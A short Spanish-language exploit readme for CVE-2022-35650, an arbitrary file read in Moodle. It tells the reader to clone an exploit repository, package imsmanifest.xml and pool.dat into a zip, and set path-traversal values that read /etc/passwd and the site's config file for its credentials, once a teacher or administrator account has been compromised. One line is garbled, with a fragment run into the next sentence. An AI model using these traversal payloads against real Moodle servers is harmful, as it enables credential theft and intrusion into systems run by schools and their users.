
Exploit para CVE-2022-35650, una lectura arbitraria de archivos en Moodle.
Esto es una lectura arbitraria de archivos en Moodle.
Debes haber comprometido un usuario a nivel de profesor o administrador.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd)/etc/passwdSi quieres leer el archivo de configuración (con credenciales jugosas), establece tu baseurl en imsmanifest.xml a esto:
../../../../../../../../../../../var/www/html
y tu src de img en pool.dat a:
muc/config.php